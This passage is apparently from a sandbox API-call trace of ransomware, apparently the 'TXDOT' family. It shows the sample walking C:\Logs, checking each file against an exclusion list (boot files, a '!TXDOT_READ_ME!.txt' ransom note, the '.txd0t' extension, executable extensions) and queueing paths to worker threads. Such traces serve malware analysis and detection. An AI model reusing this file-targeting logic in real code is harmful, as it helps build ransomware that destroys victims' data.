psz2="desktop.ini") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="autorun.inf") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="ntuser.dat") returned -1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="ntldr") returned -1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="ntdetect.com") returned -1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="bootfont.bin") returned 1 [0088.519] StrCmpIW (psz1="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.519] PathFindExtensionW (pszPath="Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned=".evtx" [0088.519] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.519] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0088.752] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.752] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" [0088.752] SetEvent (hEvent=0x408) returned 1 [0088.752] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca64aa7b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca64aa7b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cAlternateFileName="MI9F85~1.EVT")) returned 1 [0088.752] StrCmpW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2=".") returned 1 [0088.752] StrCmpW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="..") returned 1 [0088.752] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.752] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.752] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" [0088.752] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned=".evtx" [0088.752] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2=" ransom ") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="debug.txt") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="boot.ini") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="ntldr") returned -1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.752] StrCmpIW (psz1="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.752] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned=".evtx" [0088.752] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.752] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0088.759] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.759] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx" [0088.759] SetEvent (hEvent=0x418) returned 1 [0088.759] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd9ec80, ftCreationTime.dwHighDateTime=0x1d1a04f, ftLastAccessTime.dwLowDateTime=0xfd9ec80, ftLastAccessTime.dwHighDateTime=0x1d1a04f, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cAlternateFileName="MIBE3D~1.EVT")) returned 1 [0088.759] StrCmpW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2=".") returned 1 [0088.759] StrCmpW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="..") returned 1 [0088.759] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.759] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.759] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" [0088.759] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned=".evtx" [0088.759] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2=" ransom ") returned 1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="debug.txt") returned 1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="boot.ini") returned 1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.759] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.760] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.760] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="ntldr") returned -1 [0088.760] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.760] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.760] StrCmpIW (psz1="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.760] PathFindExtensionW (pszPath="Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned=".evtx" [0088.760] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.760] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0088.780] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.781] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" [0088.781] SetEvent (hEvent=0x410) returned 1 [0088.782] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9658ef3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9658ef3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-GroupPolicy%4Operational.evtx", cAlternateFileName="MIE38D~1.EVT")) returned 1 [0088.782] StrCmpW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2=".") returned 1 [0088.782] StrCmpW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="..") returned 1 [0088.782] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.782] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.782] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-GroupPolicy%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" [0088.782] PathFindExtensionW (pszPath="Microsoft-Windows-GroupPolicy%4Operational.evtx") returned=".evtx" [0088.782] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2=" ransom ") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="debug.txt") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="boot.ini") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="ntldr") returned -1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.782] StrCmpIW (psz1="Microsoft-Windows-GroupPolicy%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.782] PathFindExtensionW (pszPath="Microsoft-Windows-GroupPolicy%4Operational.evtx") returned=".evtx" [0088.782] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.783] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0088.790] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.790] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-GroupPolicy%4Operational.evtx" [0088.790] SetEvent (hEvent=0x3fc) returned 1 [0088.790] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-HotspotAuth%4Operational.evtx", cAlternateFileName="MIE386~1.EVT")) returned 1 [0088.790] StrCmpW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2=".") returned 1 [0088.790] StrCmpW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="..") returned 1 [0088.790] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.790] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.791] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-HotspotAuth%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" [0088.791] PathFindExtensionW (pszPath="Microsoft-Windows-HotspotAuth%4Operational.evtx") returned=".evtx" [0088.791] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2=" ransom ") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="debug.txt") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="boot.ini") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="ntldr") returned -1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.791] StrCmpIW (psz1="Microsoft-Windows-HotspotAuth%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.791] PathFindExtensionW (pszPath="Microsoft-Windows-HotspotAuth%4Operational.evtx") returned=".evtx" [0088.791] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.791] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0088.892] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.893] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" [0088.893] SetEvent (hEvent=0x418) returned 1 [0088.893] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cAlternateFileName="MI6B25~1.EVT")) returned 1 [0088.893] StrCmpW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2=".") returned 1 [0088.893] StrCmpW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="..") returned 1 [0088.893] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.893] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.893] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" [0088.893] PathFindExtensionW (pszPath="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned=".evtx" [0088.893] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="bootsect.bak") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="iconcache.db") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="thumbs.db") returned -1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2=" ransomware ") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2=" ransom ") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="debug.txt") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="boot.ini") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="desktop.ini") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="autorun.inf") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="ntuser.dat") returned -1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="ntldr") returned -1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="ntdetect.com") returned -1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="bootfont.bin") returned 1 [0088.893] StrCmpIW (psz1="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.893] PathFindExtensionW (pszPath="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned=".evtx" [0088.893] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.893] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0088.921] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.921] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" [0088.921] SetEvent (hEvent=0x410) returned 1 [0088.921] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-International%4Operational.evtx", cAlternateFileName="MI854A~1.EVT")) returned 1 [0088.921] StrCmpW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2=".") returned 1 [0088.921] StrCmpW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="..") returned 1 [0088.921] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0088.921] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0088.921] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-International%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" [0088.921] PathFindExtensionW (pszPath="Microsoft-Windows-International%4Operational.evtx") returned=".evtx" [0088.921] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0088.921] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="bootsect.bak") returned 1 [0088.921] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="iconcache.db") returned 1 [0088.921] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="thumbs.db") returned -1 [0088.921] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2=" ransomware ") returned 1 [0088.921] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2=" ransom ") returned 1 [0088.921] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="debug.txt") returned 1 [0088.922] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="boot.ini") returned 1 [0088.922] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="desktop.ini") returned 1 [0088.922] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="autorun.inf") returned 1 [0088.922] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="ntuser.dat") returned -1 [0088.922] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="ntldr") returned -1 [0088.922] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="ntdetect.com") returned -1 [0088.922] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="bootfont.bin") returned 1 [0088.922] StrCmpIW (psz1="Microsoft-Windows-International%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0088.922] PathFindExtensionW (pszPath="Microsoft-Windows-International%4Operational.evtx") returned=".evtx" [0088.922] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0088.922] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0088.928] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0088.928] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx", cchMax=32000 | out: 